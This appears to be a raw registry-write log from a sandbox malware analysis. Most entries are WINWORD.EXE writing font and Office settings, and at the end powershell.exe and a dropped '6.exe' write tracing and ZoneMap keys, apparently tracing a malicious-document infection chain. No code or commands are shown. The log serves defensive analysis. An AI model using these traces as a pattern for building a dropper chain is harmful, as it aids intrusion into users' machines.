WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun-ExtB
02010609060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun-ExtB
02010609060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Tai Le
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shonar Bangla
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Yi Baiti
03000500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Sans Serif
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aparajita
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ebrima
02000000000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gisha
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kokila
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Uighur
02000000000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MoolBoran
020B0100010101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Utsaah
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vijaya
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Andalus
02020603050405020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arabic Typesetting
03020402040406030203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic
02020603050405020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic Fixed
02070309020205020404
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sakkal Majalla
02000000000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Traditional Arabic
02020603050405020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aharoni
02010803020104030203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
David
020E0502060401010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FrankRuehl
020E0503060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Levenim MT
02010502060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam
020B0502050101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam Fixed
020B0509050101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Narkisim
020E0502050101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rod
02030509050101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FangSong
02010609060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@FangSong
02010609060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimHei
02010609060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KaiTi
02010609060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@KaiTi
02010609060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
AngsanaUPC
02020603050405020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Browallia New
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BrowalliaUPC
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
CordiaUPC
020B0304020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DilleniaUPC
02020603050405020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
EucrosiaUPC
02020603050405020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FreesiaUPC
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
IrisUPC
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
JasmineUPC
02020603050405020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KodchiangUPC
02020603050405020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
LilyUPC
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DFKai-SB
03000509000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DFKai-SB
03000509000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Unicode
020B0602030504020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Black
020B0A04020102020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Candara
020E0502030303020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Comic Sans MS
030F0702030302020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Consolas
020B0609020204030204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Constantia
02030602050306030303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Corbel
020B0503020204020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium
020B0603020102020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gabriola
04040605051002020D02
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Georgia
02040502050405020303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palatino Linotype
02040502050505030304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Print
02000600000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Trebuchet MS
020B0603020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Verdana
020B0604030504040204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Webdings
05030102010509060703
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MT Extra
05050102010205020202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Arial Unicode MS
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 2
05020102010507070707
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 3
05040102010807070707
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Book Antiqua
02040602050305030304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Gothic
020B0502020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Haettenschweiler
020B0706040902060204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Outlook
05010100010000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Narrow
020B0606020202030204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Garamond
02020404030301010803
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Monotype Corsiva
03010101010201010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Algerian
04020705040A02060702
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Baskerville Old Face
02020602080505020303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bauhaus 93
04030905020B02020C02
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bell MT
02020503060305020303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB
020E0602020502020306
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bernard MT Condensed
02050806060905020404
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Poster Compressed
02070706080601050204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Britannic Bold
020B0903060703020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Broadway
04040905080B02020502
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Brush Script MT
03060802040406070304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Californian FB
0207040306080B030204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Centaur
02030504050205020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Chiller
04020404031007020602
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Colonna MT
04020805060202030203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cooper Black
0208090404030B020404
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Footlight MT Light
0204060206030A020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Freestyle Script
030804020302050B0404
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harlow Solid Italic
04030604020F02020D02
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harrington
04040505050A02020702
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
High Tower Text
02040502050506030303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Jokerman
04090605060D06020702
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Juice ITC
04040403040A02020202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kristen ITC
03050502040202030202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kunstler Script
030304020206070D0D06
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Bright
02040602050505020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Calligraphy
03010101010101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Fax
02060602050505020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Handwriting
03010101010101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Magneto
04030805050802020D02
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Matura MT Script Capitals
03020802060602070202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mistral
03090702030407020403
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Modern No. 20
02070704070505020303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Engraved
04020502070703030202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Solid
04020502070702020202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Old English Text MT
03040902040508030806
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Onyx
04050602080702020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Parchment
03040602040708040804
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Playbill
040506030A0602020202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Poor Richard
02080502050505020702
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ravie
04040805050809020602
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Informal Roman
030604020304060B0204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Showcard Gothic
04020904020102020604
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Snap ITC
04040A07060A02020202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Stencil
040409050D0802020404
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tempus Sans ITC
04020404030D07020202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Viner Hand ITC
03070502030502020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vivaldi
03020602050506090804
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vladimir Script
03050402040407070305
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wide Latin
020A0A07050505020404
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT
020B0602020104020603
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed
020B0606020104020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Script MT Bold
03040602040607080904
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Extra Bold
02060903040505020403
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Condensed
02060603050405020104
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell
02060603020205020403
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rage Italic
03070502040507070304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Pristina
03060402040406080204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua Titling MT
02020502060505020804
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua
02020502060401020303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Papyrus
03070502060502030205
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palace Script MT
030303020206070C0B05
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
OCR A Extended
02010509020102010303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Maiandra GD
020E0502030308020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Typewriter
020B0509030504030204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans
020B0602030504020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Imprint MT Shadow
04020605060303030202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Stout
0202090407030B020401
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Old Style
02020502050305020303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gloucester MT Extra Condensed
02030808020601010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold Condensed
020B0A06020104020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold
020B0A02020104020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Condensed
020B0506020104020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT
020B0502020104020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Ext Condensed Bold
020B0902020104020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gigi
04040504061007020D02
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
French Script MT
03020402040607040605
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium Cond
020B0606030402020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Heavy
020B0903020102020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi Cond
020B0706030402020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi
020B0703020102020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Book
020B0503020102020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Forte
03060902040502070203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Felix Titling
04060505060202020A04
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Medium ITC
020B0602030504020804
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Light ITC
020B0402030504020804
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Demi ITC
020B0805030504020804
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Bold ITC
020B0907030504020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Engravers MT
02090707080505020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Elephant
02020904090505020303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Edwardian Script ITC
030303020407070D0804
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Curlz MT
04040404050702020202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Light
020E0507020206020404
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Bold
020E0705020206020404
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Schoolbook
02040604050505020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Castellar
020A0402060406010301
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calisto MT
02040603050505030304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bradley Hand ITC
03070402050302030203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookman Old Style
02050604050505020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Condensed
02070606080606020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Black
02070A03080606020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT
02070603080606020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Blackadder ITC
04020505051007020D02
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Rounded MT Bold
020F0704030504030204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Agency FB
020B0503020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookshelf Symbol 7
05010101010101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Sans Serif
020B0604030504040204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Specialty
05000500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB Demi
020E0802020502020306
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed Extra Bold
020B0803020202020204
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831845
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831846
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831845
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831846
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831862
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831863
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831847
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1315831848
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831847
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1315831848
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831864
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1315831865
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2196
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2196
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2196
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2196
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2804
6.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2804
6.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
EnableFileTracing
0
2804
6.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\6_RASAPI32
EnableConsoleTracing
0
2804
6.exe
write
